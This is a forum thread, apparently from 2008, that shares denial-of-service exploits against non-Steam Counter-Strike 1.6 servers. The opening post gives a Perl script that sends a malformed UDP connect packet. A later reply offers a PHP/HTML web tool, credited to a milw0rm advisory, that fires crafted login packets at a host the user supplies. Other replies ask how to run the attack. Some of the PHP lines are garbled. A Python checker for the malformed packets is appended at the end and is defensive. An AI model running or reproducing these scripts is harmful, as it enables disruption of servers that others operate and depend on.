Counter Strike 1.6 - DoS

Started by Joey, May 11, 2008, 04:13:50 PM


Joey

Exploit language: Perl
Purpose: Take down Counter-Strike 1.6 servers

#!/usr/bin/perl
# Server must not be running steam. /str0ke


# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015' ,Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
With a handful of sand I will show you terror.

lostph

sh4gr4th, I couldn't use your exploit

I use Active Perl, I saved it in the bin folder as counterstrike.pl

I ran it in MS-DOS and nothing happened ...

just a message like this

usage: ./csdos at c:\Perl\Bin\counterstrike.pl line 9.

regards

d1ngell

Quote from: "lostph"
sh4gr4th, I couldn't use your exploit

I use Active Perl, I saved it in the bin folder as counterstrike.pl

I ran it in MS-DOS and nothing happened ...

just a message like this

usage: ./csdos at c:\Perl\Bin\counterstrike.pl line 9.

regards

Same thing here :/

Ilmo. Sr. JulianoRossi

Use this one:

----[  Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ]

Counter Strike 1.6 Denial Of Service POC
Eugene Minaev underwater@itdefence.ru
Bug was found by Maxim Suhanov ( THE FUF )
works only with no-steam servers
___________________________________________________________________
____/  __ __ _______________________ _______  _______________    \  \   \
/ .\  /  /_// //              /        \       \/      __       \   /__/   /
/ /     /_//              /\        /       /      /         /     /___/
\/        /              / /       /       /\     /         /         /
/        /               \/       /       / /    /         /__       //\
\       /    ____________/       /        \/    __________// /__    // /   
/\\      \_______/        \________________/____/  2007    /_//_/   // //\
\ \\                                                               // // /
.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / .
. \_\\________[________________________________________]_________//_//_/ . .

<html>
<head>
<title>Counter Strike DOS POC (underwater@itdefence.ru) </title>

<style type="text/css">

input {
width: 150px;
}

td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}

span.err {
color: red;
}

span.ok {
color: green;
}

</style>

</head>

<body onload="checkpass()">

<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">

<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>

<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>

<tr>
<td> </td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>

<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>


<tr>
<td> </td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>


</table>
<br/>
</form>
</div>
<center>ITDEFENCE / RUSSIA (http://itdefence.ru)<br>
</body>
</html>

<?php

/*
CS-dos exploit made by underwater 
Bug was discovered by .FUF
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
*/

ini_set("display_errors","0");

function HELLO_PACKET()
{
$packet pack("H*","FFFFFFFF");
$packet &#46;= "TSource Engine Query";
$packet &#46;= pack("H*","00");
return $packet;
}

function CHALLENGE_PACKET()
{
$packet pack("H*","FFFFFFFF");
$packet &#46;= "getchallenge valve";
$packet &#46;= pack("H*","00");
return $packet;
}

function LOGIN_PACKET_4()
{
global $cookie;
global $password;
$packet pack("H*","FFFFFFFF");
$packet &#46;= "connect 47 ";
$packet &#46;= $cookie&#46;' "';
$packet &#46;= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet &#46;= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet &#46;= 'el\gordon\name\Born to be pig (&#46;&#46;)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet &#46;= 'word\\'&#46;$password;
$packet &#46;= pack("H*","220A0000EE02");
return $packet;
}

function LOGIN_PACKET_2()
{
global $cookie;
global $password;
$packet pack("H*","FFFFFFFF");
$packet &#46;= "connect 47 ";
$packet &#46;= $cookie&#46;' "';
$packet &#46;= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet &#46;= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
$packet &#46;= 'e\Born to be pig (&#46;&#46;)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet &#46;= 'word\\'&#46;$password;
$packet &#46;= pack("H*","22");
return $packet;
}

function dowork($host,$port,$password,$auth)
{
global $password;
global $cookie;
# connecting to target host
$fsock fsockopen("udp&#58;//"&#46;$host,(int) $port,$errnum,$errstr,2);
if (!$fsock) die ($errstr);
else 
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp fread($fsock,100);
# grab cookies from packet
$cookie substr($resp,strpos($resp,"A00000000")+10);
$cookie substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$authfwrite $fsock,LOGIN_PACKET_4());else fwrite $fsock,LOGIN_PACKET_2());
$resp fread($fsock,100);
}
}

IF (isset($_POST['host'&#93;) && isset($_POST['port'&#93;))
{
IF (empty($_POST['pass'&#93;)) $password = "123";
else $password $_POST['pass'&#93;;
$fserver $_POST['host'&#93;;
$fport $_POST['port'&#93;;
if (isset($_POST['auth'&#93;)) $fauth = true;else $fauth=false;
# we have to connect 2 times
$result dowork($fserver,$fport,$password,$fauth);
$result dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>


----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]
"Worse than insecurity...
... is the false sense of being secure."
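
A defender-side structural check for the `connect` datagrams that both scripts in this thread send, as an added example that is not part of any post. The layout is read off the packets above; `check_connect`, `parse_info` and the sample values are hypothetical names and constructed data. It flags the empty userinfo string the Perl script sends; the PHP script's info strings are well-formed key/value pairs, so this check alone does not flag that variant.

```python
import re

HEADER = b"\xff\xff\xff\xff"  # connectionless marker both PoCs prepend
# Layout taken from the packets on this page (an assumption, not a spec):
#   connect <protocol> <challenge> "<protinfo>" "<userinfo>"
CONNECT_RE = re.compile(rb'connect (\d+) (-?\d+) "([^"]*)" ?"([^"]*)"')

def parse_info(raw):
    """Parse a \\key\\value info string; return a dict, or None if malformed."""
    if not raw.startswith(b"\\"):
        return None
    parts = raw[1:].split(b"\\")
    keys, values = parts[0::2], parts[1::2]
    if len(keys) != len(values) or b"" in keys:
        return None  # dangling key or empty key name
    return dict(zip(keys, values))

def check_connect(datagram):
    """Return findings for one UDP payload; an empty list means nothing flagged."""
    if not datagram.startswith(HEADER + b"connect "):
        return []  # not a connect request; out of scope for this check
    m = CONNECT_RE.match(datagram, len(HEADER))
    if m is None:
        return ["connect line does not match the expected layout"]
    findings = []
    if parse_info(m.group(3)) is None:
        findings.append("malformed protinfo")
    if parse_info(m.group(4)) is None:
        findings.append("malformed userinfo")
    return findings

# Constructed samples: the challenge 12345678 and the cdkey are made-up values.
CDKEY = b"0" * 32
PERL_SHAPED = (HEADER + b'connect 47 12345678 "\\prot\\4\\unique\\0\\raw\\valve'
               b'\\cdkey\\' + CDKEY + b'""\\"\x00\x00')
PHP_SHAPED = (HEADER + b'connect 47 12345678 "\\prot\\4\\unique\\-1\\raw\\valve'
              b'\\cdkey\\' + CDKEY + b'" "\\name\\player\\rate\\3500"\n')

if __name__ == "__main__":
    for label, pkt in (("perl-shaped", PERL_SHAPED), ("php-shaped", PHP_SHAPED)):
        print(label, check_connect(pkt))
```

Findings from a check like this are best logged with the source address and rate-limited at the edge, since the datagrams are UDP and the source can be spoofed.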